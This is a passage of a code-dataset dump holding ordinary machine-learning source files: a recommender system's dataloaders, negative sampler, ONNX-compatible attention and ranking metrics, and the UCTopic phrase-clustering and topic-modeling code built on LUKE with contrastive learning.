ax1 = fig.add_subplot(121)
ax2 = fig.add_subplot(122)
ax1.set_title('Image EPID')
ax2.set_title('Image en dose')
ax1.axis('off')
ax2.axis('off')
img1 = ax1.imshow(X)
img2 = ax2.imshow(Image_dose)
colorbar(img1)
colorbar(img2)
plt.tight_layout()
plt.show()
return Image_dose
if __name__ == '__main__':
Path_Image_EPID = '/home/nfssrv/liu/Desktop/Machine_Learning/codes/Pytorch_Dose/Images/set_26/5_acquired.epi.content'
isANN = True
Static = False
VMAT = False
Image_dose = main(Path_Image_EPID, isANN, Static, VMAT)
``` |
{
"source": "JiachengLi1995/FastRec",
"score": 2
} |
#### File: src/dataloaders/__init__.py
```python
from src.datasets import dataset_factory
from .sasrec import SASRecDataloader
DATALOADERS = {
SASRecDataloader.code(): SASRecDataloader,
}
def dataloader_factory(args, dataset):
dataloader = DATALOADERS[args.dataloader_code]
dataloader = dataloader(args, dataset)
train, val, test = dataloader.get_pytorch_dataloaders()
return train, val, test, dataset
```
#### File: src/datasets/__init__.py
```python
from .interaction import ItemDataset
DATASETS = {
ItemDataset.code(): ItemDataset,
}
def dataset_factory(args):
dataset = DATASETS[args.dataset_code]
return dataset(args)
```
#### File: datasets/negative_samplers/popular.py
```python
from .base import AbstractNegativeSampler
from tqdm import trange
from tqdm import tqdm
from collections import Counter
import numpy as np
class PopularNegativeSampler(AbstractNegativeSampler):
@classmethod
def code(cls):
return 'popular'
def generate_negative_samples(self):
popularity = self.items_by_popularity()
keys = list(popularity.keys())
values = [popularity[k] for k in keys]
sum_value = np.sum(values)
p = [value / sum_value for value in values]
negative_samples = {}
print('Sampling negative items')
for user in tqdm(self.test):
seen = set(self.train[user])
seen.update(self.val[user])
seen.update(self.test[user])
samples = []
while len(samples) < self.sample_size:
sampled_ids = np.random.choice(keys, self.sample_size, replace=False, p=p).tolist()
sampled_ids = [x for x in sampled_ids if x not in seen and x not in samples]
samples.extend(sampled_ids)
samples = samples[:self.sample_size]
negative_samples[user] = samples
return negative_samples
def items_by_popularity(self):
popularity = Counter()
for user in tqdm(self.test):
popularity.update(self.train[user])
popularity.update(self.val[user])
popularity.update(self.test[user])
return popularity
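    # Illustrative note: with popularity counts {1: 3, 2: 1} the probabilities
    # computed above become p = [0.75, 0.25], so np.random.choice draws popular
    # items more often, while the `seen` filter keeps observed interactions out
    # of the negative samples.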
```
#### File: src/models/onnx_support.py
```python
from typing import Optional
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
MAX_VAL = 1e4 # considering fp16
########
# Tril #
########
def tril_mask_onnx(inputs: torch.BoolTensor,
diagonal: Optional[int] = 0) -> torch.FloatTensor:
"""Caveat to export an tril-based mask with ONNX.
Args:
inputs: Input tensor.
diagonal: Value of diagonal.
Returns:
(torch.FloatTensor): Output tensor.
"""
arange = torch.arange(inputs.size(0), device=inputs.device)
arange2 = torch.arange(inputs.size(1), device=inputs.device)
mask = arange.unsqueeze(-1).expand(-1, inputs.size(1)) >= (arange2 - diagonal)
return mask
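# Sanity check (illustrative, assuming the intent is to mirror torch.tril on an
# all-ones boolean mask of the same shape):
#   m = torch.ones(4, 5, dtype=torch.bool)
#   assert torch.equal(tril_mask_onnx(m), torch.tril(torch.ones(4, 5)).bool())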
class PointWiseFeedForward(torch.nn.Module):
def __init__(self, hidden_units, dropout_rate):
super(PointWiseFeedForward, self).__init__()
self.linear1 = torch.nn.Linear(hidden_units, hidden_units)
self.dropout1 = torch.nn.Dropout(p=dropout_rate)
self.relu = torch.nn.ReLU()
self.linear2 = torch.nn.Linear(hidden_units, hidden_units)
self.dropout2 = torch.nn.Dropout(p=dropout_rate)
def forward(self, inputs):
outputs = self.dropout2(self.linear2(self.relu(self.dropout1(self.linear1(inputs.transpose(-1, -2))))))
outputs = outputs.transpose(-1, -2) # as Conv1D requires (N, C, Length)
outputs += inputs
return outputs
class MultiHeadAttention(nn.Module):
"Take in model size and number of heads."
def __init__(self, d_model, h, dropout=0.1):
super().__init__()
assert d_model % h == 0
self.d_k = d_model // h
self.h = h
self.linear_layers = nn.ModuleList([nn.Linear(d_model, d_model) for _ in range(3)])
self.output_linear = nn.Linear(d_model, d_model)
self.dropout = nn.Dropout(p=dropout)
def forward(self, query, key, value, attn_mask=None):
batch_size = query.size(0)
query, key, value = [l(x).view(batch_size, -1, self.h, self.d_k).transpose(1, 2)
for l, x in zip(self.linear_layers, (query, key, value))]
scores = torch.matmul(query, key.transpose(-2, -1)) / math.sqrt(query.size(-1))
if attn_mask is not None:
# scores = scores.masked_fill(mask, -MAX_VAL)
# TensorRT TODO: `masked_fill` cannot be supported by TensorRT 8.2.0
if len(attn_mask.size()) == 2:
mask = attn_mask.unsqueeze(0).unsqueeze(0) * MAX_VAL
scores = scores - mask
p_attn = F.softmax(scores, dim=-1)
if self.dropout is not None:
p_attn = self.dropout(p_attn)
x = torch.matmul(p_attn, value)
x = x.transpose(1, 2).contiguous().view(batch_size, -1, self.h * self.d_k)
return self.output_linear(x), p_attn
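    # Note on the masking above: subtracting attn_mask * MAX_VAL before the
    # softmax approximates masked_fill(mask, -inf) while remaining exportable to
    # ONNX/TensorRT; with MAX_VAL = 1e4 the masked logits are pushed low enough
    # to vanish after softmax, also in fp16 (see the MAX_VAL comment above).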
```
#### File: src/trainers/__init__.py
```python
from .sasrec import SASRecSampleTrainer
TRAINERS = {
SASRecSampleTrainer.code(): SASRecSampleTrainer,
}
def trainer_factory(args, model, train_loader, val_loader, test_loader, ckpt_root, user2seq, embed_only=False):
trainer = TRAINERS[args.trainer_code]
return trainer(args, model, train_loader, val_loader, test_loader, ckpt_root, user2seq, embed_only)
```
#### File: src/trainers/utils.py
```python
import torch
import torch.nn as nn
from sklearn.metrics import f1_score, precision_score, recall_score
MAX_VAL = 1e4
THRESHOLD = 0.5
class Ranker(nn.Module):
def __init__(self, metrics_ks, user2seq):
super().__init__()
self.ks = metrics_ks
self.ce = nn.CrossEntropyLoss()
self.user2seq = user2seq
def forward(self, scores, labels, lengths=None, seqs=None, users=None):
labels = labels.squeeze(-1)
loss = self.ce(scores, labels)
        predicts = scores[torch.arange(scores.size(0)), labels].unsqueeze(-1)  # gather predicted values
if seqs is not None:
scores[torch.arange(scores.size(0)).unsqueeze(-1), seqs] = -MAX_VAL # mask the rated items
if users is not None:
for i in range(len(users)):
scores[i][self.user2seq[users[i].item()]] = -MAX_VAL
valid_length = (scores > -MAX_VAL).sum(-1).float()
rank = (predicts < scores).sum(-1).float()
res = []
for k in self.ks:
indicator = (rank < k).float()
res.append(
((1 / torch.log2(rank+2)) * indicator).mean().item() # ndcg@k
)
res.append(
indicator.mean().item() # hr@k
)
res.append((1 / (rank+1)).mean().item()) # MRR
res.append((1 - (rank/valid_length)).mean().item()) # AUC
# res.append((1 - (rank/valid_length)).mean().item()) # AUC
return res + [loss.item()]
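    # Worked example (illustrative): if exactly 3 unmasked items score higher
    # than the ground-truth item, then rank = 3, so for k = 5: HR@5 = 1,
    # NDCG@5 = 1 / log2(3 + 2), MRR = 1 / (3 + 1), and AUC = 1 - 3 / valid_length.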
class SampleRanker(nn.Module):
def __init__(self, metrics_ks, user2seq):
super().__init__()
self.ks = metrics_ks
self.ce = nn.CrossEntropyLoss()
self.user2seq = user2seq
def forward(self, scores):
        predicts = scores[:, 0].unsqueeze(-1)  # gather predicted values
valid_length = scores.size()[-1] - 1
rank = (predicts < scores).sum(-1).float()
res = []
for k in self.ks:
indicator = (rank < k).float()
res.append(
((1 / torch.log2(rank+2)) * indicator).mean().item() # ndcg@k
)
res.append(
indicator.mean().item() # hr@k
)
res.append((1 / (rank+1)).mean().item()) # MRR
res.append((1 - (rank/valid_length)).mean().item()) # AUC
return res + [0]
``` |
{
"source": "JiachengLi1995/UCTopic",
"score": 2
} |
#### File: JiachengLi1995/UCTopic/clustering_ccl_finetune.py
```python
import torch
import numpy as np
import random
from tqdm import tqdm
from collections import defaultdict, Counter
from uctopic.models import UCTopicCluster
from clustering.trainer import ClusterLearner
from clustering.kmeans import get_kmeans
from clustering.dataloader import get_train_loader
from clustering.consts import ARGS, TOKENIZER, DEVICE
from clustering.utils import dataset_reader, get_features, set_logger, update_logger, get_rankings
from clustering.evaluation import evaluate_embedding
def set_global_random_seed(seed):
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
np.random.seed(seed)
random.seed(seed)
def main():
set_global_random_seed(ARGS.seed)
# Conduct clustering with kmeans
if 'conll2003' in ARGS.data_path:
label_dict = {'PER':0, 'LOC':1, 'ORG':2}
elif 'bc5cdr' in ARGS.data_path:
label_dict = {'Chemical': 0, 'Disease': 1}
elif 'mitmovie' in ARGS.data_path:
label_dict = {'person': 0, 'title': 1}
elif 'wnut2017' in ARGS.data_path:
label_dict = {'corporation': 0, 'creative_work':1, 'group': 2,
'location': 3, 'person': 4, 'product': 5}
else:
raise NotImplementedError
ARGS.num_classes = len(label_dict)
model = UCTopicCluster.from_pretrained("uctopic-base")
model.to(DEVICE)
model.eval()
clustering_data = dataset_reader(ARGS.data_path, label_dict)
features, labels = get_features(clustering_data, TOKENIZER, model)
score_factor, score_cosine, cluster_centers = get_kmeans(features, labels, ARGS.num_classes)
rankings = get_rankings(score_cosine, positive_ratio=0.1)
pseudo_label_dict = defaultdict(list)
for i in range(len(rankings)):
for j in range(len(rankings[i])):
pseudo_label_dict[clustering_data[rankings[i][j]]['span_lemma']].append(j)
## majority vote
for phrase, predictions in pseudo_label_dict.items():
pseudo_label_dict[phrase] = Counter(predictions).most_common()[0][0]
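    # For example (illustrative): if a span lemma collected the pseudo labels
    # [2, 2, 0] from its ranked mentions, Counter(...).most_common()[0][0]
    # assigns it the majority label 2.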
model.update_cluster_centers(cluster_centers)
# dataset loader
train_loader = get_train_loader(ARGS, pseudo_label_dict)
# optimizer
optimizer = torch.optim.Adam(model.parameters(), lr=ARGS.lr)
print(optimizer)
# set up logger
logger = set_logger(ARGS.save_path)
global_step = 0
# set up the trainer
evaluate_embedding(clustering_data, TOKENIZER, model, ARGS, global_step, logger)
learner = ClusterLearner(model, optimizer)
model.train()
for epoch in range(ARGS.epoch):
tqdm_dataloader = tqdm(train_loader, ncols=100)
for features in tqdm_dataloader:
for feature in features:
for k, v in feature.items():
feature[k] = v.to(DEVICE)
loss = learner.forward(features)
tqdm_dataloader.set_description(
'Epoch{}, Global Step {}, CL-loss {:.5f}'.format(
epoch, global_step, loss['Instance-CL_loss']
))
update_logger(logger, loss, global_step)
global_step+=1
if global_step % ARGS.steps_per_eval == 0:
evaluate_embedding(clustering_data, TOKENIZER, model, ARGS, global_step, logger)
model.train()
print('Final test:')
evaluate_embedding(clustering_data, TOKENIZER, model, ARGS, global_step, logger)
if __name__ == '__main__':
main()
```
#### File: UCTopic/clustering/consts.py
```python
import argparse
import torch
import spacy
from . import UCTopicTokenizer
from nltk import WordNetLemmatizer
def get_device(gpu):
return torch.device('cpu' if gpu is None else f'cuda:{gpu}')
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--gpu", type=str, default=None)
parser.add_argument("--data_path", type=str, default='data/conll2003/all_data.json')
parser.add_argument("--save_path", type=str, default='clustering_results/')
parser.add_argument("--num_classes", type=int, default=2)
parser.add_argument("--max_training_examples", type=int, default=100000)
parser.add_argument("--steps_per_eval", type=int, default=20)
parser.add_argument("--preprocessing_num_workers", type=int, default=4)
parser.add_argument("--epoch", type=int, default=50)
parser.add_argument("--seed", type=int, default=999)
parser.add_argument("--batch_size", type=int, default=32)
parser.add_argument("--lr", type=float, default=1e-5)
parser.add_argument("--temp", type=float, default=0.05)
parser.add_argument('--alpha', type=float, default=1.0)
args = parser.parse_args()
return args
ARGS = parse_args()
DEVICE = get_device(ARGS.gpu)
TOKENIZER = UCTopicTokenizer.from_pretrained('studio-ousia/luke-base')
LEMMATIZER = WordNetLemmatizer()
NLP = spacy.load('en_core_web_sm', disable=['ner'])
```
#### File: JiachengLi1995/UCTopic/find_topic.py
```python
import torch
import os
import random
from tqdm import tqdm
import numpy as np
import json
import pickle
from multiprocessing import Pool
from collections import defaultdict, Counter
from clustering.utils import get_rankings
from clustering.kmeans import get_kmeans, get_kmeans_score
from topic_modeling.dataloader import get_train_loader
from clustering.trainer import ClusterLearner
from topic_modeling.consts import NLP, ARGS, DEVICE
from topic_modeling.utils import read_data, get_features, get_probs
from uctopic.models import UCTopicCluster
class NounPhraser:
@staticmethod
def process_data(data):
sentence_dict = dict()
phrase_list = []
for line in data:
doc_id = line['doc_id']
text = line['text']
sentence_dict[doc_id] = text
pool = Pool(processes=ARGS.num_workers)
pool_func = pool.imap(func=NounPhraser.rule_based_noun_phrase, iterable=data)
doc_tuples = list(tqdm(pool_func, total=len(data), ncols=100, desc=f'Process data and extract phrases'))
for phrases in doc_tuples:
phrase_list += phrases
pool.close()
pool.join()
return sentence_dict, phrase_list
@staticmethod
def rule_based_noun_phrase(line):
definite_articles = {'a', 'the', 'an', 'this', 'those', 'that', 'these', \
'my', 'his', 'her', 'your', 'their', 'our'}
text = line['text']
if not text:
return []
doc_id = line['doc_id']
doc = NLP(text)
if len(doc) > ARGS.max_length:
return []
phrases = []
for chunk in doc.noun_chunks:
start, end = chunk.start, chunk.end ## token-level idx
if len(chunk.text.split()) > 1:
left_p = '(' in chunk.text
right_p = ')' in chunk.text
if left_p == right_p:
ps = chunk.text
if ps.split(" ")[0].lower() in definite_articles:
new_ps = " ".join(ps.split(" ")[1:])
start_char = chunk.start_char + len(ps) - len(new_ps)
span_lemma = ' '.join([doc[i].lemma_.lower() for i in range(start+1, end)])
assert doc.text[start_char:chunk.end_char] == new_ps
phrases.append((doc_id, start_char, chunk.end_char, span_lemma))
else:
span_lemma = ' '.join([doc[i].lemma_.lower() for i in range(start, end)])
phrases.append((doc_id, chunk.start_char, chunk.end_char, span_lemma))
else:
if doc[chunk.start].pos_ != 'PRON':
span_lemma = ' '.join([doc[i].lemma_.lower() for i in range(start, end)])
phrases.append((doc_id, chunk.start_char, chunk.end_char, span_lemma))
return phrases
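    # Illustrative example of the rule above: for "The large pizza was amazing",
    # spaCy yields the noun chunk "The large pizza"; the leading article is
    # stripped, so the extracted tuple is roughly (doc_id, 4, 15, "large pizza")
    # (character offsets depend on the surrounding text), and pronoun-only
    # chunks are skipped entirely.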
def main():
model = UCTopicCluster.from_pretrained('uctopic-base')
model.to(DEVICE)
model.eval()
data_path = os.path.join(ARGS.data_path)
ARGS.num_classes = eval(ARGS.num_classes)
data = read_data(data_path)
sentence_dict, phrase_list = NounPhraser.process_data(data)
# To make sure the number of topics, we randomly sample part of phrases first
phrase_list_sampled = random.sample(phrase_list, min(ARGS.sample_num_cluster, len(phrase_list)))
features = get_features(sentence_dict, phrase_list_sampled, model)
kmeans_scores = []
for num_class in range(ARGS.num_classes[0], ARGS.num_classes[1]+1):
score = get_kmeans_score(features, num_class)
print('For n_clusters = ', num_class, 'The silhouette_score is: ', score)
kmeans_scores.append((num_class, score))
kmeans_scores = sorted(kmeans_scores, key=lambda x: x[1], reverse=True)
num_class = kmeans_scores[0][0]
print('We select the number of topics: ', num_class)
## To finetune, we randomly sample part of phrases
phrase_list_sampled = random.sample(phrase_list, min(ARGS.sample_num_finetune, len(phrase_list)))
features = get_features(sentence_dict, phrase_list_sampled, model)
score_factor, score_cosine, cluster_centers = get_kmeans(features, None, num_class)
rankings = get_rankings(score_cosine, positive_ratio=0.1)
pseudo_label_dict = defaultdict(list)
for i in range(len(rankings)):
for j in range(len(rankings[i])):
pseudo_label_dict[phrase_list_sampled[rankings[i][j]][-1]].append(j)
## majority vote
for phrase, predictions in pseudo_label_dict.items():
pseudo_label_dict[phrase] = Counter(predictions).most_common()[0][0]
model.update_cluster_centers(cluster_centers)
# dataset loader
train_loader = get_train_loader(sentence_dict, phrase_list_sampled, ARGS, pseudo_label_dict)
# optimizer
optimizer = torch.optim.Adam(model.parameters(), lr=ARGS.lr)
print(optimizer)
# set up logger
global_step = 0
# set up the trainer
learner = ClusterLearner(model, optimizer)
model.train()
ret = False
for epoch in range(ARGS.epoch):
tqdm_dataloader = tqdm(train_loader, ncols=100)
for features in tqdm_dataloader:
for feature in features:
for k, v in feature.items():
feature[k] = v.to(DEVICE)
loss = learner.forward(features)
tqdm_dataloader.set_description(
'Epoch{}, Global Step {}, CL-loss {:.5f}'.format(
epoch, global_step, loss['Instance-CL_loss']
))
global_step+=1
if global_step >= ARGS.finetune_step:
ret = True
break
if ret:
break
model.eval()
all_prob = get_probs(sentence_dict, phrase_list, model)
all_pred = all_prob.max(1)[1].tolist()
all_prob = all_prob.numpy()
assert len(phrase_list) == len(all_pred)
phrase_pred = []
merge_phrase_dict = defaultdict(list)
topic_phrase_dict = defaultdict(list)
for phrase, pred, prob in zip(phrase_list, all_pred, all_prob):
phrase_pred.append([phrase, pred])
merge_phrase_dict[phrase[-1]].append(prob)
for phrase, prob_list in merge_phrase_dict.items():
prob_mean = np.array(prob_list).mean(axis=0)
pred = prob_mean.argmax()
merge_phrase_dict[phrase] = [pred, prob_mean[pred]]
topic_phrase_dict[str(pred)].append((phrase, prob_mean[pred]))
for topic, v in topic_phrase_dict.items():
topic_phrase_dict[str(topic)] = [(line[0], str(round(line[1], 4))) for line in sorted(v, key=lambda x: x[1], reverse=True)]
results_path = os.path.join(ARGS.save_path, ARGS.dataset)
if not os.path.exists(ARGS.save_path):
os.mkdir(ARGS.save_path)
if not os.path.exists(results_path):
os.mkdir(results_path)
with open(os.path.join(results_path, 'phrase_instances_pred.json'), 'w', encoding='utf8') as f:
json.dump(phrase_pred, f)
with open(os.path.join(results_path, 'merged_phrase_pred_prob.pickle'), 'wb') as f:
pickle.dump(merge_phrase_dict, f)
with open(os.path.join(results_path, 'topics_phrases.json'), 'w', encoding='utf8') as f:
json.dump(topic_phrase_dict, f)
if __name__ == '__main__':
main()
```
#### File: UCTopic/topic_modeling/consts.py
```python
import os
import torch
import spacy
import argparse
from . import UCTopicTokenizer
from nltk import WordNetLemmatizer
def get_device(gpu):
return torch.device('cpu' if gpu is None else f'cuda:{gpu}')
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--gpu", type=int, default=None)
parser.add_argument("--data_path", type=str, default='data/topic_data/')
parser.add_argument("--dataset", type=str, default='google_restaurant')
parser.add_argument("--save_path", type=str, default='topic_results')
parser.add_argument("--num_classes", type=str, default='[10, 25]', help='Min and Max number of classes.')
parser.add_argument("--sample_num_cluster", type=int, default=5000)
parser.add_argument("--sample_num_finetune", type=int, default=100000)
parser.add_argument("--contrastive_num", type=int, default=10)
parser.add_argument("--finetune_step", type=int, default=2000)
parser.add_argument("--num_workers", type=int, default=8)
parser.add_argument("--epoch", type=int, default=10)
parser.add_argument("--max_length", type=int, default=32)
parser.add_argument("--batch_size", type=int, default=16)
parser.add_argument("--lr", type=float, default=1e-5)
parser.add_argument("--temp", type=float, default=0.05)
parser.add_argument('--alpha', type=float, default=1.0)
args = parser.parse_args()
return args
ARGS = parse_args()
ARGS.data_path = os.path.join(ARGS.data_path, ARGS.dataset+'.json')
DEVICE = get_device(ARGS.gpu)
TOKENIZER = UCTopicTokenizer.from_pretrained('studio-ousia/luke-base')
LEMMATIZER = WordNetLemmatizer()
NLP = spacy.load('en_core_web_sm', disable=['ner'])
```
#### File: UCTopic/uctopic/models.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.distributed as dist
from torch.nn import Parameter
from transformers.models.roberta.modeling_roberta import RobertaLMHead
from transformers.models.luke.modeling_luke import LukePreTrainedModel
from transformers import LukeConfig, LukeModel
class UCTopicConfig(LukeConfig):
def __init__(
self,
vocab_size=50267,
entity_vocab_size=500000,
hidden_size=768,
entity_emb_size=256,
num_hidden_layers=12,
num_attention_heads=12,
intermediate_size=3072,
hidden_act="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=512,
type_vocab_size=2,
initializer_range=0.02,
layer_norm_eps=1e-12,
gradient_checkpointing=False,
use_entity_aware_attention=True,
pad_token_id=1,
bos_token_id=0,
eos_token_id=2,
alpha=1.0,
temp=0.05,
**kwargs
):
super().__init__(
vocab_size,
entity_vocab_size,
hidden_size,
entity_emb_size,
num_hidden_layers,
num_attention_heads,
intermediate_size,
hidden_act,
hidden_dropout_prob,
attention_probs_dropout_prob,
max_position_embeddings,
type_vocab_size,
initializer_range,
layer_norm_eps,
gradient_checkpointing,
use_entity_aware_attention,
pad_token_id,
bos_token_id,
eos_token_id,
**kwargs
)
# for contrastive learning
self.alpha = alpha
self.temp = temp
class MLPLayer(nn.Module):
"""
    Projection head (linear layer + Tanh) applied to the pooled phrase/entity representation.
"""
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
self.activation = nn.Tanh()
def forward(self, features, **kwargs):
x = self.dense(features)
x = self.activation(x)
return x
class Similarity(nn.Module):
"""
Dot product or cosine similarity
"""
def __init__(self, temp):
super().__init__()
self.temp = temp
self.cos = nn.CosineSimilarity(dim=-1)
def forward(self, x, y):
return self.cos(x, y) / self.temp
class UCTopicModel(LukePreTrainedModel):
def __init__(self, model_args, luke_config):
super().__init__(luke_config)
self.model_args = model_args
self.model_name = model_args.model_name_or_path
self.luke = LukeModel.from_pretrained(self.model_name)
self.luke_config = luke_config
self.lm_head = RobertaLMHead(self.luke_config)
self.mlp = MLPLayer(self.luke_config)
self.sim = Similarity(temp=self.model_args.temp)
def forward(self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
entity_ids=None,
entity_attention_mask=None,
entity_token_type_ids=None,
entity_position_ids=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
phrase_emb=False,
mlm_input_ids=None,
mlm_labels=None,
):
if phrase_emb:
return self.phremb_forward(input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
entity_ids=entity_ids,
entity_attention_mask=entity_attention_mask,
entity_token_type_ids=entity_token_type_ids,
entity_position_ids=entity_position_ids,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
else:
return self.cl_forward(input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
entity_ids=entity_ids,
entity_attention_mask=entity_attention_mask,
entity_token_type_ids=entity_token_type_ids,
entity_position_ids=entity_position_ids,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
mlm_input_ids=mlm_input_ids,
mlm_labels=mlm_labels,
)
def cl_forward(self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
entity_ids=None,
entity_attention_mask=None,
entity_token_type_ids=None,
entity_position_ids=None,
output_attentions=None,
output_hidden_states=None,
mlm_input_ids=None,
mlm_labels=None,
):
batch_size = input_ids.size(0)
num_sent = input_ids.size(1)
entity_length = entity_ids.size(2)
max_mention_length = entity_position_ids.size(-1)
mlm_outputs = None
# Flatten input for encoding
input_ids = input_ids.view((-1, input_ids.size(-1))) # (bs * num_sent, len)
attention_mask = attention_mask.view((-1, attention_mask.size(-1))) # (bs * num_sent len)
entity_ids = entity_ids.view(-1, entity_length)
entity_attention_mask = entity_attention_mask.view(-1, entity_length)
entity_position_ids = entity_position_ids.view(-1, entity_length, max_mention_length)
if token_type_ids is not None:
token_type_ids = token_type_ids.view((-1, token_type_ids.size(-1))) # (bs * num_sent, len)
if entity_token_type_ids is not None:
entity_token_type_ids = entity_token_type_ids.view(-1, entity_length)
# Get raw embeddings
outputs = self.luke(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
entity_ids=entity_ids,
entity_attention_mask=entity_attention_mask,
entity_token_type_ids=entity_token_type_ids,
entity_position_ids=entity_position_ids,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=True,
)
# MLM auxiliary objective
if mlm_input_ids is not None:
mlm_input_ids = mlm_input_ids.view((-1, mlm_input_ids.size(-1)))
mlm_outputs = self.luke(
mlm_input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=True,
)
entity_pooler = outputs['entity_last_hidden_state'] # (bs*num_sent, entity_length, hidden_size)
entity_pooler = entity_pooler.view((batch_size, num_sent, entity_pooler.size(-1))) # (bs, num_sent, hidden) entity_length should be 1
entity_pooler = self.mlp(entity_pooler)
# # Separate representation
z1, z2 = entity_pooler[:,0], entity_pooler[:,1]
# # Gather all embeddings if using distributed training
if dist.is_initialized() and self.training:
# Dummy vectors for allgather
z1_list = [torch.zeros_like(z1) for _ in range(dist.get_world_size())]
z2_list = [torch.zeros_like(z2) for _ in range(dist.get_world_size())]
# Allgather
dist.all_gather(tensor_list=z1_list, tensor=z1.contiguous())
dist.all_gather(tensor_list=z2_list, tensor=z2.contiguous())
# Since allgather results do not have gradients, we replace the
# current process's corresponding embeddings with original tensors
z1_list[dist.get_rank()] = z1
z2_list[dist.get_rank()] = z2
# Get full batch embeddings: (bs x N, hidden)
z1 = torch.cat(z1_list, 0)
z2 = torch.cat(z2_list, 0)
cos_sim = self.sim(z1.unsqueeze(1), z2.unsqueeze(0))
labels = torch.arange(cos_sim.size(0)).long().to(cos_sim.device)
loss_fct = nn.CrossEntropyLoss()
loss = loss_fct(cos_sim, labels)
correct_num = (torch.argmax(cos_sim, 1) == labels).sum().detach().cpu().item()
# Calculate loss for MLM
if mlm_outputs is not None and mlm_labels is not None:
mlm_labels = mlm_labels.view(-1, mlm_labels.size(-1))
prediction_scores = self.lm_head(mlm_outputs.last_hidden_state)
masked_lm_loss = loss_fct(prediction_scores.view(-1, self.luke_config.vocab_size), mlm_labels.view(-1))
loss = loss + self.model_args.mlm_weight * masked_lm_loss
return {'loss': loss, 'logits': cos_sim, 'correct_num': correct_num, 'total_num': batch_size}
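    # Illustration (not from the original repo; a minimal, self-contained sketch of the
    # same objective): with in-batch negatives the positive pair for row i sits on the
    # diagonal of cos_sim, so the cross-entropy labels are simply 0..batch-1.
    #
    #     import torch, torch.nn as nn
    #     z1, z2 = torch.randn(8, 128), torch.randn(8, 128)   # two views per phrase
    #     cos_sim = nn.CosineSimilarity(dim=-1)(z1.unsqueeze(1), z2.unsqueeze(0)) / 0.05
    #     loss = nn.CrossEntropyLoss()(cos_sim, torch.arange(8))  # diagonal = positives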
def phremb_forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
entity_ids=None,
entity_attention_mask=None,
entity_token_type_ids=None,
entity_position_ids=None,
head_mask=None,
inputs_embeds=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
return_dict = return_dict if return_dict is not None else self.luke_config.use_return_dict
outputs = self.luke(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
entity_ids=entity_ids,
entity_attention_mask=entity_attention_mask,
entity_token_type_ids=entity_token_type_ids,
entity_position_ids=entity_position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
return outputs
class UCTopic(LukePreTrainedModel):
config_class = UCTopicConfig
def __init__(self, config):
super().__init__(config)
self.luke = LukeModel(config)
self.config = config
self.mlp = MLPLayer(self.config)
def forward(self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
entity_ids=None,
entity_attention_mask=None,
entity_token_type_ids=None,
entity_position_ids=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None
):
outputs = self.luke(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
entity_ids=entity_ids,
entity_attention_mask=entity_attention_mask,
entity_token_type_ids=entity_token_type_ids,
entity_position_ids=entity_position_ids,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
if return_dict:
entity_pooler = outputs['entity_last_hidden_state'] # (bs, entity_length, hidden_size)
else:
entity_pooler = outputs.entity_last_hidden_state
entity_pooler = self.mlp(entity_pooler)
return outputs, entity_pooler.squeeze()
class UCTopicCluster(LukePreTrainedModel):
config_class = UCTopicConfig
def __init__(self, config, cluster_centers=None):
super().__init__(config)
self.luke = LukeModel(config)
self.config = config
self.mlp = MLPLayer(self.config)
self.alpha = self.config.alpha
self.sim = Similarity(temp=self.config.temp)
self.softmax = nn.Softmax(dim=-1)
# Instance-CL head
if cluster_centers is not None:
initial_cluster_centers = torch.tensor(
cluster_centers, dtype=torch.float, requires_grad=True)
self.cluster_centers = Parameter(initial_cluster_centers)
def forward(self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
entity_ids=None,
entity_attention_mask=None,
entity_token_type_ids=None,
entity_position_ids=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None
):
outputs = self.luke(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
entity_ids=entity_ids,
entity_attention_mask=entity_attention_mask,
entity_token_type_ids=entity_token_type_ids,
entity_position_ids=entity_position_ids,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
if return_dict:
entity_pooler = outputs['entity_last_hidden_state'] # (bs, entity_length, hidden_size)
else:
entity_pooler = outputs.entity_last_hidden_state
entity_pooler = self.mlp(entity_pooler)
return outputs, entity_pooler.squeeze()
def get_cl_loss(self, anchor_embd, cl_embd):
batch_size, hidden_size = anchor_embd.size()
anchor_embd = anchor_embd.unsqueeze(1) ##(batch, 1, hidden_size)
cl_embd = cl_embd.view([batch_size, -1, hidden_size])
cos_sim = self.sim(anchor_embd, cl_embd) ##(batch, class_num)
label_size = cos_sim.size(0)
labels = torch.zeros(label_size, device=anchor_embd.device, dtype=torch.long) # (batch_size)
loss_fct = nn.CrossEntropyLoss()
loss = loss_fct(cos_sim, labels)
return loss
def get_cluster_prob(self, embeddings):
cos = self.sim(embeddings.unsqueeze(1), self.cluster_centers.unsqueeze(0))
return self.softmax(cos)
def update_cluster_centers(self, cluster_centers):
initial_cluster_centers = torch.tensor(
